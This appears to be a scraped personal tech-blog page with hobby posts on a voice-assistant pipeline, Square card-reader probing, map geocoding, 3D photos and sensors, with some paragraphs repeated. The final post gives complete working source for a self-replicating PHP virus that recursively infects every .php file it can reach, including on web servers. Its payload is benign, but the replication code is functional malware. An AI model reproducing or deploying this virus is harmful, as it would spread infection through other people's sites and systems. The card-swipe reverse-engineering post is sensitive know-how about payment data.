cranklin.com
guns, computers, politics
JANUARY 13, 2012
Building My Own Siri / Jarvis
Most of the magic behind Siri happens remotely.
I want to create my OWN version of Siri…. except I don’t care for having it on my phone. I want my entire house to be talking to me… more like Jarvis (from Ironman).
I believe I have access to all the right resources to create this AI.
It breaks down into three major parts:
1) convert speech to text
2) query database populated with q&a
3) convert text to speech
It breaks down into three major parts:
1) convert speech to text
2) query database populated with q&a
3) convert text to speech
Speech to Text
Most speech to text engines suck. Siri’s works exceptionally well because the engine isn’t on your phone… it’s remote. I supposed we can hack Siri by running a MITM attack on an iphone and faking the SSL cert and intercepting the apple ID…. OR we can do something much simpler. Google’s Chrome 11 browser includes a voice input function (which isn’t yet part of the HTML5 standard) and can convert your speech into text. This guy discovered that it was happening remotely through an undocumented API call to google. All we have to do is access this same API and we got ourselves a free Speech-to-Text engine!
In case you don’t understand Perl, this is how you use the API:
POST to:
https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US
POST params:
Content
(which should include the contents of a .flac encoding of your voice recorded in mono 16000hz or 8000hz)Content_Type
(which should read “audio/x-flac; rate=16000″ or 8000 depending on your voice recording. This should also be mirrored in the Content-Type section of your header.)
Response: json text
I used ffmpeg to convert my audio into the desired format:
ffmpeg -i Memo.m4a -vn -ac 1 -ar 16000 -acodec flac test.flac
So I recorded my voice on my iphone 3gs asking “what day is it today?” and converted it to the appropriate .flac format and posted it to google’s API and this is what I got in response:
{"status":0,"id":"008bd1a95c3c2b04bd754da5e82949f4-1","hypotheses":[{"utterance":"what day is it today","confidence":0.91573924}]}
Sweet.
Database populated with Q&A
This is probably the most difficult part to obtain. To build it from scratch would require tons of data and advanced algorithms to interpret sentences constructed in various ways. I read somewhere that Siri was using Wolfram Alpha’s database….. so…. I checked out Wolfram Alpha and they have an engine that answers your questions. Not only that, they also offer an API service. (If you query less than 2000 times a month, it’s free!). So I signed up for the API service and tested it out. I asked it some simple questions like “What day is it today?” and “Who is the president of the United States?”. It returns all answers in a well-formed XML format.
<?xml version='1.0' encoding='UTF-8'?>
<queryresult success='true'
error='false'
numpods='1'
datatypes='City,DateObject'
timedout=''
timing='1.728'
parsetiming='0.193'
parsetimedout='false'
recalculate=''
id='MSP77719ii856b9090fei40000543b8b9eibb14ida&s=21'
related='http://www4d.wolframalpha.com/api/v2/relatedQueries.jsp?id=MSP77819ii856b9090fei400001d3h9h126cgaeigc&s=21'
version='2.1'>
<pod title='Result'
scanner='Identity'
id='Result'
position='200'
error='false'
numsubpods='1'
primary='true'>
<subpod title=''
primary='true'>
<plaintext>Friday, January 13, 2012</plaintext>
</subpod>
</pod>
</queryresult>
Again…. sweet.
Text to Speech
This part is easy… and google makes it even easier with yet another undocumented API! It’s straight-forward. A simple GET request to:
Just replace the
http://translate.google.com/translate_tts?tl=en&q=speech+to+convert
Just replace the
q
parameter with any sentence and you can hear google’s female robot voice say anything you want.Voice Input
I can either make my program run over a web browser or as a stand-alone app. Running it over the web browser is cool because I would then be able to run it from just about any machine. Unfortunately, HTML 5 doesn’t have a means of recording voice. My options are a) only use google Chrome, b) make a flash app, c) make a Java applet.
Anywho… no big deal.
Putting It All Together
<?php
$stturl = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US";
$wolframurl = "http://api.wolframalpha.com/v2/query?appid=[GET+YOUR+OWN+STINKIN+APP+ID]&format=plaintext&podtitle=Result&input=";
$ttsurl = "http://translate.google.com/translate_tts?tl=en&q=master+cranky,+";
// Google Speech to Text
$filename = "./test1.flac";
$upload = file_get_contents($filename);
$data = array(
"Content_Type" => "audio/x-flac; rate=16000",
"Content" => $upload,
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $stturl);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array("Content-Type: audio/x-flac; rate=16000"));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
ob_start();
curl_exec($ch);
curl_close($ch);
$contents = ob_get_contents();
ob_end_clean();
$textarray = (json_decode($contents,true));
$text = $textarray['hypotheses']['0']['utterance'];
// Wolfram Alpha API
$wolframurl .= urlencode($text);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wolframurl);
ob_start();
curl_exec($ch);
curl_close($ch);
$contents = ob_get_contents();
ob_end_clean();
$obj = new SimpleXMLElement($contents);
$answer = $obj->pod->subpod->plaintext;
// Google Text to Speech
$ttsurl .= urlencode($answer);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ttsurl);
ob_start();
curl_exec($ch);
curl_close($ch);
$contents = ob_get_contents();
ob_end_clean();
header('Content-Type: audio/mpeg');
header('Cache-Control: no-cache');
print $contents;
?>
It responds with this answer. Good girl.
It’s still missing the voice input portion of the code. Currently, it just accepts a .flac file. I wrote 3 chunks of code that I put together as one pipeline of an AI process. The advantage of this over Siri is that I can intervene at anytime. I can have it listen for particular questions such as “who is your master?” and respond appropriately…. but more importantly, I can have it listen for “Turn on my lights” or “turn on the TV” or “open the garage door” or “turn to channel 618″. Certain questions will have my bot send a signal to the appropriate Arduino controlled light switch or garage switch or IR blaster and respond with a “yes, master”. I’ll post videos when it’s done.
It’s still missing the voice input portion of the code. Currently, it just accepts a .flac file. I wrote 3 chunks of code that I put together as one pipeline of an AI process. The advantage of this over Siri is that I can intervene at anytime. I can have it listen for particular questions such as “who is your master?” and respond appropriately…. but more importantly, I can have it listen for “Turn on my lights” or “turn on the TV” or “open the garage door” or “turn to channel 618″. Certain questions will have my bot send a signal to the appropriate Arduino controlled light switch or garage switch or IR blaster and respond with a “yes, master”. I’ll post videos when it’s done.
JANUARY 4, 2012
Hacking the Square
For Christmas, I received a cool little device called the square from Ed Park. You plug this device into the audio mini jack on your smartphone and you can swipe credit cards right on your phone. It’s perfect for people doing business on the go. Or… next time your buddy owes you money, the “I don’t have any cash on me right now” excuse won’t work.
The first strange thing I noticed was that the data was being inputed via the audio jack rather than the data port (located at the bottom of the iphone). There are 3 types of audio mini jacks: Mono, stereo, stereo/microphone. Since the iphone audio jack accepts corded hands-free earpieces as well as earphones for music, it has to be the combo jack (stereo/microphone).
If you look at the tip, you’ll notice there are four sections separated by insulated plastic rings.
This type of plug is known as the “TRRS”. T-R-R-S stands for Tip-Ring-Ring-Sleeve. The tip is for Left-channel audio out. The first ring is for Right-channel audio out. The second ring is Ground. The sleeve is for Microphone in.
What I would like to know is how the square transmits your credit card number into the software through the audio port.
Now, before wiring each terminal up to an arduino and outputting data to serial, since input is only possible through the sleeve (microphone terminal), maybe we can find out if the data is actually audible! By simply plugging it into a computer mic in port or firing the voice recorder app on the iphone, we can find out what our credit cards sound like.
What I would like to know is how the square transmits your credit card number into the software through the audio port.
Now, before wiring each terminal up to an arduino and outputting data to serial, since input is only possible through the sleeve (microphone terminal), maybe we can find out if the data is actually audible! By simply plugging it into a computer mic in port or firing the voice recorder app on the iphone, we can find out what our credit cards sound like.
Interesting. So if I just recorded the swipe of each of my credit cards, I can technically store credit card numbers as wav files and play them directly into the square software. I was inspecting each of my credit card wav files and tried to notice some kind of pattern that matched the pattern of my credit card numbers. I didn’t think that was going to be successful, but it was worth a shot.
I then decided to rig the square swiper up to my arduino and display output to serial.
Here is the arduino code:
Here is the arduino code:
const int mic = A5;
int counter = 0;
void setup()
{
Serial.begin( 9600 );
}
void loop()
{
counter++;
Serial.print(analogRead(mic));
Serial.print(" ");
delay(50);
if(counter>=40){
counter=0;
Serial.print("\n");
}
}
I chose an analog input because that audio minijack is analog. I know what each section in the TRRS specs do, but does it need power? Do I need to connect the ground? Do I need to power it through both left and right channels? I wasn’t sure, so I decided to simply try different combinations.
When I connect the ground, I get a bunch of ‘O’s. When I swipe the credit card, I get a few numbers… but not nearly enough to carry the data I’m assuming the stripe holds. When I disconnect ground I notice something interesting.
Now I’m still not sure if I’m on the right track because I expected a bunch of 1′s and 0′s…. but I noticed a pattern in the numbers. The numbers are grouped in 4′s. Every four numbers, the pattern repeats itself.
It makes perfect sense. I’m going to assume the credit card stripe MUST be carrying 4 rows of data… thus 4 different reads from the swiper. So I tried swiping my credit card to investigate the reads. (I’m not posting the output from my credit card here…. but I’ll post the output from when I swiped my Disneyland Annual Passport!)
I’m gonna go ahead and assume the data isn’t encrypted (at this level at least. I’m pretty certain it’s encrypted at the software level)… so it’s just a matter of deobfuscating it. Unfortunately for me, I was staring closely at the output and I started getting sleepy. Hmmm. I’m not sure if I’m on the right track or not… so feel free to chime in if you have any ideas. I shall come back to this later.
DECEMBER 31, 2011
My Onionmap Patent
One of my previous jobs was at Onionmap as the Director of Engineering. Titles mean crap. I don’t even know what it means to be a “director”. A more accurate job title would have been “systems architect”… but whatever.
Onionmap was actually pretty cool. They provided interactive maps of major cities (33 to be exact). Unlike google maps, they were 3 dimensional visual/artistic renderings representing the city and its major landmarks. In other words, they’re tourist maps. The maps are skewed, exaggerated while landmarks are enlarged and unsightly objects such as parking lots are non-existant.
Prior to my arrival, Onionmap hired many different engineers. Besides talking a big game at meetings, they provided no real work (sort of like politicians). Meeting after meeting, they would sweet-talk everyone else into confidence. At the end of the day, they did absolutely nothing. Another thing these previous “engineers” had in common was that they all believed that it was impossible to geocode the skewed maps. In other words, these maps could never be used with GPS data nor pinpoint exact addresses.
When I joined the Onionmap team, I was obsessed with geocoding these maps.
A couple months into it, I’ve tested out several different theories… Pulled out my old trigonometry books… Tried all sorts of weird things with angle measurements, etc. They weren’t working. I cleared my head and tried to think simple. I truly believe true engineering is about simplicity. I realized I was onto something with y-intercepts. Yes… going way back in Math. Then I got it. Before the 3rd month of my employment, I had figured it out and wrote the engine. I presented it to the company and they asked me to do a write-up immediately so they can file it for patent. Patent? Okay.
Now I’m not a big fan of patent laws and frivolous lawsuits. On top of that, I’m not even sure of that fate of onionmap. Shame. I don’t want my algorithm/code to go to waste. At least I can share it with you here on my blog:
You can download it here.
You’ll notice the inventors are listed as me, Jonathan Lee (my cool project manager), and a guy named Young Kim. Mind you, Young Kim is a douchebag that lives in Korea that did absolutely nothing to contribute to this. He’s a self proclaimed “CTO”, but he has absolutely NO knowledge of anything remotely technical. Because of this guy, I wasted MUCH time building onionmap versions 1,2,3,4,5,6,7. No joke. Two years of working at Onionmap, I built 7 different versions of the site and NONE of it was released. That’s how you demoralize your engineer. Just saying. Anyways, here is the write-up submitted for patent.
Onionmap Patents
Patent #1 Translation OSAT-Geocode: Inventor: Young Kim, Eddie Kim, Jonathan LeeBusiness concept:Background: Onionmap Spatial Analysis Technology (OSAT) is a proprietary process to create the beautiful and easy 3D building and map. OSAT is best to be understood as a piece of outstanding art work. Anyone can draw a building and a landscape, but depending on the ability of each artist, each drawing gives different human reactions. OSAT is not patented but it is protected under Onionmap trade mark and copy right.OSAT is not scaled because OSAT wants to achieve the beautiful representation of a 3D building and the landscape. The proprietary process has a complex making process in order to achieve the beautiful and easy visual representation of the 3D building and the map. Although it is not scale and there is no consistent way of producing each 3D building and the map, there is a need to translate a Geocode to OSAT code so a location in the real world can be identified on the OSAT visual online interactive map.Because each OSAT city map is unique, the translation from Geocode to each OSAT map is also unique. However, this unique process is consistent and replicable and accurate. And this unique process of translation is the core component to link to all the business functions of Onionmap products that based on OSAT map. Hence Onionmap intends to patent this process.Scientific Process of Translation from Geocode to OSAT code To initialize our transcoding engine, we must follow these steps:First, we take our map and find the total width and total height.Next we plot the longitude and latitude pairs for each corner of the map. (You can use Google maps to find this data)Once we plot these points, we need to find the exact north/south slope (simply find a street or 2 points on the map that are perfectly parallel to the standard longitude lines)Using this information, calculate the slope. (Rise over run)Then we find the exact east/west slope on the map. (Simply find a street or 2 points on the map that are perfectly parallel to the standard latitude lines)Using this information, calculate the slope. (Rise over run)m = (y2 - y1) / (x2 - x1)How the transcoding engine works:Given the longitude x, we find 2 corners of the map where x lies between the longitude counterpart of its Geocode location. (If x does not lie between any 2 corners' longitude values, then the target location is outside of our map)We then find where x lies in relevance to the longitude values of these 2 corners.ratio = (corner1 - x) / (corner2 - corner1)Using the slope north and south slope, we find the y-intercept of each of these longitude lines using the following equation in slope intercept form:y = mx + b (x and y are onionmap coordinates)Once we solve for b for each corner (corner1_b, corner2_b), we apply the ratio to our y-intercepts and solve for target_b.ratio = (corner1_b - target_b) / (corner2_b - corner1_b)Once we have solved for target_b we plug target_b and the north and south slope m into our equation:y = mx + band we have obtained the equation for our first line longitude_line.Next we repeat this same process to find our latitude_line by using our east and west slope, and the latitude counterparts of our geocode data. Once we have solved for latitude_line and longitude_line, we find the intersection of these 2 lines by solving for y and x.First we solve for x:(m1 * x) + b1 = (m1 * x) + b2Then we solve for y:y = m1 * x + b1 OR y = m2 * x + b2We now have our (x,y) pair.Increase accuracy: so far we take 4 points, corner points, for the translation. If we take 4 more additional points, we can increase accuracy.The translation for OSAT code to Geocode is a reverse process of the above process.How the transcoding engine works:Given the longitude x, we find 2 corners of the map where x lies between the longitude counterpart of its Geocode location. (If x does not lie between any 2 corners' longitude values, then the target location is outside of our map)We then find where x lies in relevance to the longitude values of these 2 corners.ratio = (corner1 - x) / (corner2 - corner1)Using the slope north and south slope, we find the y-intercept of each of these longitude lines using the following equation in slope intercept form:y = mx + b (x and y are onionmap coordinates)Once we solve for b for each corner (corner1_b, corner2_b), we apply the ratio to our y-intercepts and solve for target_b.ratio = (corner1_b - target_b) / (corner2_b - corner1_b)Once we have solved for target_b we plug target_b and the north and south slope m into our equation:y = mx + band we have obtained the equation for our first line longitude_line.Next we repeat this same process to find our latitude_line by using our east and west slope, and the latitude counterparts of our geocode data. Once we have solved for latitude_line and longitude_line, we find the intersection of these 2 lines by solving for y and x.First we solve for x:(m1 * x) + b1 = (m1 * x) + b2Then we solve for y:y = m1 * x + b1 OR y = m2 * x + b2We now have our (x,y) pair.Increase accuracy: so far we take 4 points, corner points, for the translation. If we take 4 more additional points, we can increase accuracy.The translation for OSAT code to Geocode is a reverse process of the above process.Technology Product: The following are the initial ‘working’ product in the form of computer software code. Just like every other software, this product will evolve with the time.Excerpt of Geocode.php (class) <?php /* Geocode classUsage: if(!is_object($Geocode)) $geocode = new Geocode($CITY); *///Requirements:class Geocode {// DEBUG MODE private $debug = 0;// SELECTED CITY private $city;// COORDINATES FOR EACH CORNER OF THE MAP (OM view) private $om_ul_long; private $om_ur_long; private $om_ll_long; private $om_lr_long; private $om_ul_lat; private $om_ur_lat; private $om_ll_lat; private $om_lr_lat;private $x_min; private $x_max; private $y_min; private $y_max;// LONGITUDE AND LATITUDE SLOPE private $slope_long; private $slope_lat;// GEOCODER BASE URL (REST) private $geocoder_api_rest = "http://rpc.geocoder.us/service/csv?address="; private $yahoo_geocoder_api_rest = "http://local.yahooapis.com/MapsService/V1/geocode?appid=WCZ107vV34Ed.N5OCPbHpRbalLm1nezhYnzoy597AvofLaVUQvItD3AQNNUGZQw-&location=";// Constructor public function __construct(){ $city = "las vegas"; $this->city = $city; switch($city){ case "las vegas": $this->om_ul_long = -115.22015; $this->om_ul_lat = 36.15413611111111; $this->om_ur_long = -115.13938055555556; $this->om_ur_lat = 36.187127777777775; $this->om_ll_long = -115.17540277777778; $this->om_ll_lat = 36.084944444444446; $this->om_lr_long = -115.10328055555556; $this->om_lr_lat = 36.11882222222222;$this->x_min = 0; $this->x_max = 10565; $this->y_min = 0; $this->y_max = 4700;$this->slope_lat = (4029 - 3609)/(-2859 + 1000); $this->slope_long = (4299 - 3059)/(-1372 + 2888);break; default: } }public function geocode2omcode($latitude,$longitude){ if($this->debug) echo "<br>Geocode::geocode2omcode<br>"; if($this->debug) echo "<br>".$latitude."<br>".$longitude; if($longitude > $this->om_ul_long && $longitude < $this->om_lr_long && $latitude > $this->om_ll_lat && $latitude < $this->om_ur_lat){ // check to see if it's within the area (natural view)// Convert latitude to om code if($latitude < $this->om_lr_lat){ $ratio_lat = ($latitude - $this->om_ll_lat)/($this->om_lr_lat - $this->om_ll_lat); // y = mx + b $b_lat_1 = (-1)*$this->y_max - ($this->slope_lat * $this->x_min); $b_lat_2 = (-1)*$this->y_max - ($this->slope_lat * $this->x_max); $b_lat = $b_lat_1 + (($b_lat_2 - $b_lat_1) * $ratio_lat); // ($b_lat - $b_lat_1)/($b_lat_2 - $b_lat_1) = $ratio_lat // y = ($this->slope_lat * x) + $b_lat if($this->debug) echo "<br>ll - lr<br>b1,b2: ".$b_lat_1.",".$b_lat_2."<br>ratio: ".$ratio_lat."<br>slope: ".$this->slope_lat."<br>b: ".$b_lat; } elseif($latitude < $this->om_ul_lat){ $ratio_lat = ($latitude - $this->om_lr_lat)/($this->om_ul_lat - $this->om_lr_lat); // y = mx + b $b_lat_1 = (-1)*$this->y_max - ($this->slope_lat * $this->x_max); $b_lat_2 = (-1)*$this->y_min - ($this->slope_lat * $this->x_min); $b_lat = $b_lat_1 + (($b_lat_2 - $b_lat_1) * $ratio_lat); // ($b_lat - $b_lat_1)/($b_lat_2 - $b_lat_1) = $ratio_lat // y = ($this->slope_lat * x) + $b_lat IF($THIS->debug) echo "<br>lr - ul<br>b1,b2: ".$b_lat_1.",".$b_lat_2."<br>ratio: ".$ratio_lat."<br>slope: ".$this->slope_lat."<br>b: ".$b_lat; } else{ $ratio_lat = ($latitude - $this->om_ul_lat)/($this->om_ur_lat - $this->om_ul_lat); // y = mx + b $b_lat_1 = (-1)*$this->y_min - ($this->slope_lat * $this->x_min); $b_lat_2 = (-1)*$this->y_min - ($this->slope_lat * $this->x_max); $b_lat = $b_lat_1 + (($b_lat_2 - $b_lat_1) * $ratio_lat); // ($b_lat - $b_lat_1)/($b_lat_2 - $b_lat_1) = $ratio_lat // y = ($this->slope_lat * x) + $b_lat if($this->debug) echo "<br>ul - ur<br>b1,b2: ".$b_lat_1.",".$b_lat_2."<br>ratio: ".$ratio_lat."<br>slope: ".$this->slope_lat."<br>b: ".$b_lat; }// Convert longitude to om code if($longitude < $this->om_ll_long){ $ratio_long = ($longitude - $this->om_ul_long)/($this->om_ll_long - $this->om_ul_long); // y = mx + b $b_long_1 = (-1)*$this->y_min - ($this->slope_long * $this->x_min); $b_long_2 = (-1)*$this->y_max - ($this->slope_long * $this->x_min); $b_long = (-1) * ($b_long_1 + (($b_long_1 - $b_long_2) * $ratio_long)); // ($b_long - $b_long_1)/($b_long_2 - $b_long_1) = $ratio_long // y = ($this->slope_long * x) + $b_long if($this->debug) echo "<br>ul - ll<br>b1,b2: ".$b_long_1.",".$b_long_2."<br>ratio: ".$ratio_long."<br>slope: ".$this->slope_long."<br>b: ".$b_long; } elseif($longitude < $this->om_ur_long){ $ratio_long = ($longitude - $this->om_ll_long)/($this->om_ur_long - $this->om_ll_long); // y = mx + b $b_long_1 = (-1)*$this->y_max - ($this->slope_long * $this->x_min); $b_long_2 = (-1)*$this->y_min - ($this->slope_long * $this->x_max); $b_long = $b_long_1 + (($b_long_2 - $b_long_1) * $ratio_long); // ($b_long - $b_long_1)/($b_long_2 - $b_long_1) = $ratio_long // y = ($this->slope_long * x) + $b_long if($this->debug) echo "<br>ll - ur<br>b1,b2: ".$b_long_1.",".$b_long_2."<br>ratio: ".$ratio_long."<br>slope: ".$this->slope_long."<br>b: ".$b_long; } else{ $ratio_long = ($longitude - $this->om_ur_long)/($this->om_lr_long - $this->om_ur_long); // y = mx + b $b_long_1 = (-1)*$this->y_min - ($this->slope_long * $this->x_max); $b_long_2 = (-1)*$this->y_max - ($this->slope_long * $this->x_max); $b_long = $b_long_1 + (($b_long_2 - $b_long_1) * $ratio_long); // ($b_long - $b_long_1)/($b_long_2 - $b_long_1) = $ratio_long // y = ($this->slope_long * x) + $b_long if($this->debug) echo "<br>ur - lr<br>b1,b2: ".$b_long_1.",".$b_long_2."<br>ratio: ".$ratio_long."<br>slope: ".$this->slope_long."<br>b: ".$b_long; }// Find intersection of the 2 lines $x = ($b_long - $b_lat) / ($this->slope_lat - $this->slope_long); // (this->slope_long * x) + $b_long = ($this->slope_lat * x) + $b_lat $y = (-1)*(($this->slope_lat * $x) + $b_lat); if($this->debug) echo "<br>".$x.",".$y; $omcode[0] = $x; $omcode[1] = $y; return $omcode; } else{ // outside of map area } } ?>
DECEMBER 20, 2011
Convert Your Pictures to 3D
If you’re curious as to how I made it and how it works, read on.
Get your red and cyan 3D glasses out. I was at Ed Park’s place and he had a pair of red / cyan 3D glasses along with a 3D drawing notepad.
Get your red and cyan 3D glasses out. I was at Ed Park’s place and he had a pair of red / cyan 3D glasses along with a 3D drawing notepad.
Cool. In theory, I understood how 3D glasses work… but I wanted to experiment with it more. So Ed kindly let me borrow the notepad and the glasses.
So, when you look at a 3D image, there are 2 images… one blue (or cyan), one red. The glasses cancel one of them out on each eye, tricking your brain’s depth perception.
So, when you look at a 3D image, there are 2 images… one blue (or cyan), one red. The glasses cancel one of them out on each eye, tricking your brain’s depth perception.
I decided to write software that can 1) take one photo and make it 3D glasses compatible and 2) take two photos that were taken side by side and combine them as one 3D glasses compatible photo.
Sounds do-able… Why not? I first took a photo of my parents’ dog Einstein
I love PHP-GD. You can do wonders with it. So I used a GD image filter with the IMG_FILTER_COLORIZE option and I was able to apply the appropriate filters needed to make this work.
Now, going back to Ed’s notepad…. there’s a scribble on it. When I look at it right-side up, the scribble looks like it’s floating on top of a grid of lines. When I flip the notepad upside down, the scribble looks like it’s underneath the grid. Interesting. The red filter is on my left eye, so if the red image is shifted to the right of the cyan image, it pops in. If the red image is shifted to the left of the cyan image, it pops out!
This image pops in and
this image pops out.
To be honest, this is kind of boring because the “anchor” is the dust on my laptop screen…. and the 2nd image, in order for it to look popped out, you need to stand back from your screen.
Now, what if I took 2 photos (the way 3d movies are filmed with 2 lenses) and I applied a red filter on one and a cyan filter on the other? Wouldn’t that be much better?
To be honest, this is kind of boring because the “anchor” is the dust on my laptop screen…. and the 2nd image, in order for it to look popped out, you need to stand back from your screen.
Now, what if I took 2 photos (the way 3d movies are filmed with 2 lenses) and I applied a red filter on one and a cyan filter on the other? Wouldn’t that be much better?
Taking these photos, I tried it out.
Now you need to step back from your computer screen with your 3d glasses in order for it to look good. I made the mistake of taking a photo of an object much too close.
If you see doubles, step back. Way back. Why do you see doubles? Well, focus on your computer screen and put your finger close to your eyes. You see double right? Apparently it’s not possible to make the image pop out SO close to your face that it can kiss you…. That is, without you seeing double. Now, if I shift the photos so the red and blue image overlap at the bottle, that becomes the focal point. Everything in front of it pops out and everything behind it pops in.
I made the focal point the plant on my desk. Pretty cool. Go ahead and use the 3d-izer to 3d-ize your photos. Just remember to take photos of objects that are somewhat distant. It also looks better on a bigger screen.
Cranky’s 3d-izer
Cranky’s 3d-izer
Enjoy. Here’s the source code:
if(is_uploaded_file($_FILES['leftphoto']['tmp_name'])){
$leftphoto = $_FILES['leftphoto']['tmp_name'];
$leftphototype = $_FILES['leftphoto']['type'];
if(is_uploaded_file($_FILES['rightphoto']['tmp_name'])){
$type = "double";
$rightphoto = $_FILES['rightphoto']['tmp_name'];
$rightphototype = $_FILES['rightphoto']['type'];
}
else{
$type = "single";
$rightphoto = $_FILES['leftphoto']['tmp_name'];
$rightphototype = $leftphototype;
}
$glasses = $_POST['glasses'];
$poptype = $_POST['poptype'];
if($leftphototype === "image/jpeg" || $leftphototype === "image/pjpeg"){
$bim = imagecreatefromjpeg($leftphoto);
$rim = imagecreatefromjpeg($rightphoto);
}
elseif($leftphototype === "image/png" || $leftphototype === "image/x-png"){
$bim = imagecreatefrompng($leftphoto);
$rim = imagecreatefrompng($rightphoto);
}
elseif($leftphototype === "image/gif"){
$bim = imagecreatefromgif($leftphoto);
$rim = imagecreatefromgif($rightphoto);
}
unlink($leftphoto);
if($type==="double") unlink($rightphoto);
if($glasses === "redblue") $gvalue=0;
elseif($glasses === "redcyan") $gvalue=255;
imagefilter($bim, IMG_FILTER_COLORIZE, 0, $gvalue, 255);
imagefilter($rim, IMG_FILTER_COLORIZE, 255, 0, 0);
if($type==="double") $offset = 0;
elseif($poptype==="in") $offset = -50;
else $offset = 50;
imagecopymerge($rim,$bim,$offset,0,0,0,imagesx($bim),imagesy($bim),50);
header('Content-Type: image/jpeg');
imagejpeg($rim);
imagedestroy($rim);
imagedestroy($bim);
}
DECEMBER 6, 2011
Testing My Robot’s Eyes
I’m working on building my first robot, but I’m still trying to decide all of its functions. What I do know is this:
1) It will be pretty primitive.
2) It will have wheels or treads instead of feet.
3) I’m going to try to make it look cute
1) It will be pretty primitive.
2) It will have wheels or treads instead of feet.
3) I’m going to try to make it look cute
So I’m testing out its eyes right now. They look like eyes, but technically it’s a ear and a mouth. My robot will use echolocation (like bats) to be aware of its surroundings and avoid obstacles.
One side transmits a high frequency wave and the other waits for it to return. The timing allows us to determine the distance from a solid object.
This module was so cheap on ebay, I was a bit skeptical as to how well it would work. It works great. It’s surprisingly accurate. I tested it with this short snippet of code:
#include <Ultrasonic.h>
Ultrasonic ultrasonic( 12, 13 );
void setup()
{
Serial.begin( 9600 );
}
void loop()
{
Serial.print( ultrasonic.Ranging(INC) );
Serial.println( " in" );
delay(1000);
}
Automatic Toilet Flusher?
If I wanted to, I could add something like this in the code:
distance = ultrasonic.Ranging(INC);
if(distance<DISTANCE_TO_WALL){
counter++;
}
else{
if(counter>20000){
flush_toilet();
}
counter=0;
}
… and hook up a servo to the arduino and it would be an automatic toilet flusher that flushes the toilet after you step away from the toilet. The commercial sensors you see on toilets nowadays use IR sensors rather than ultrasonic sensors like this one… but this ultrasonic sensor, using my code, would eliminate the annoying random premature flushes (while placing your toilet seat cover on the toilet seat, or while you’re sitting on your toilet). But to be honest, I don’t want my robot’s eyes to sit atop a toilet all day. No. I wouldn’t do that to him/her.
NOVEMBER 30, 2011
Copycats: When I Move You Move!
In April 2011, my buddy Eugene launched a website called Likeacoupon.com. Likeacoupon is very clever. This deal site doesn’t require you to do anything but “like” the coupon on facebook. The wonderful coupons and simplicity made the site viral. So viral in fact, that I was brought on board to deal with the high traffic and scalability issues. I mean… it’s not everyday you see a website earn over 172,000 “likes” in a little over half a year…. and that’s for the main site, not the individual coupons. Might I boast that when likeacoupon released a sephora coupon, it directed so much traffic to sephora.com that it brought down their site for a few hours?
Lol. We meant no harm. It was like an unintentional DDOS attack. But that’s how effective likeacoupon is.
In October, Eric Mitchell launched a knockoff of likeacoupon.com. It’s called “likebids.com”. Okay. Now I understand that good ideas attract copycats and knockoffs… but c’mon. Be a little original please?
Not only did they copy the “about” word for word, they copied the meta og:description tag (used for facebook opengraph) word for word. Hahaha. These guys are just shameless.
I got 5 words for you Eric Mitchell:
When I move you move!
When I move you move!
NOVEMBER 29, 2011
How to Create a Computer Virus
I was sick (and bored) this week, and my brain didn’t want to do any work. I was laying in bed with a cold/flu virus, thinking about modern day computer viruses while shaking my head in disappointment (or virii for the 90′s hackers… hereinafter shall be referred to as “viruses” for everyone else’s sake). Computer viruses these days are a joke. They’re not very stealth, they don’t spread very far, and they can be removed far too easily. Once upon a time, viruses were a form of art… and they were ALL written in Assembly. Anything less (or shall I say more), was considered a joke. The traditional computer virus’ job was simple:
Search for infectable files.
Check for virus signature.
If it exists, it’s infected. Keep searching. If not, infect it using the bytes from one of the infected files.
Don’t bomb the computer until a trigger of some sort.. eg: a particular date.
Check for virus signature.
If it exists, it’s infected. Keep searching. If not, infect it using the bytes from one of the infected files.
Don’t bomb the computer until a trigger of some sort.. eg: a particular date.
And that’s all there is to it. Some consider computer viruses as the most primitive form of artificial intelligence because its primary function is to replicate itself or “spawn” just like any other life form. Since virus authors today like to write viruses in higher-level languages, I decided to write my own virus in a higher-level language… nevertheless, keeping the traditional methods of replication and bombing. I wrote it in PHP and I did this for fun. It took me no longer than the duration of 2 Twilight Zone (original series) episodes. It’s educational, but please take caution if you run it. It IS a working virus and it WILL recurse directories and infect other PHP files… which in turn will infect other PHP files. The “bomb” portion of the virus doesn’t do anything malicious… it just prints a “HAPPY BIRTHDAY CRANKY!” to the screen on my actual birthday. The interesting thing about writing a virus in PHP is that a) it can run on Windows, OS X, and *nix and b) once it infects a website, any php file that is run as a direct result of a user visiting your website will cause the virus to run and infect other php files and, if triggered on the correct day, say “HAPPY BIRTHDAY CRANKY!” on the said website… unless of course, it runs into file permission restrictions.
<?php
define("SIGNATURE", "CRANKY'S PHP VIRUS");
// determine whether backslash or forward slashes are used
define("SLASH", stristr($_SERVER['PWD'], "/") ? "/" : "\\");
$linenumber = __LINE__;
define("STARTLINE",$linenumber-4);
define("ENDLINE",$linenumber+45);
function search($path){
$ret = "";
$fp = opendir($path);
while($f = readdir($fp)){
if( preg_match("#^\.+$#", $f) ) continue; // ignore symbolic links
$file_full_path = $path.SLASH.$f;
if(is_dir($file_full_path)) { // if it's a directory, recurse
$ret .= search($file_full_path);
} else if( !stristr(file_get_contents($file_full_path), SIGNATURE) ) { // search for uninfected files to infect
$ret .= $file_full_path."\n";
}
}
return $ret;
}
function infect($filestoinfect){
$handle = @fopen(__FILE__, "r");
$counter = 1;
$virusstring = "";
while(($buffer=fgets($handle,4096)) !== false){
if($counter>=STARTLINE && $counter<=ENDLINE){
$virusstring .= $buffer;
}
$counter++;
}
fclose($handle);
$filesarray = array();
$filesarray = explode("\n",$filestoinfect);
foreach($filesarray AS $v){
if(substr($v,-4)===".php"){
$filecontents = file_get_contents($v);
file_put_contents($v,$virusstring.$filecontents);
}
}
}
function bomb(){
if(date("md") == 0125){
echo "HAPPY BIRTHDAY CRANKY!";
}
}
$filestoinfect = search(__DIR__);
infect($filestoinfect);
bomb();
?>
You can also download the source code here.
To test it out, I wrote a bunch of short and simple php files and placed it in the same folder. Then I made a subfolder and put some php files in there. Then I made a subsubfolder and put some php files in there as well. I ran the virus and what do you know? It infected ALL the php files. By changing a couple characters in the regex, I can make this recurse up the directory structure as well… but I didn’t. Enjoy, be safe, and don’t be a malicious script kiddy.
NOVEMBER 18, 2011
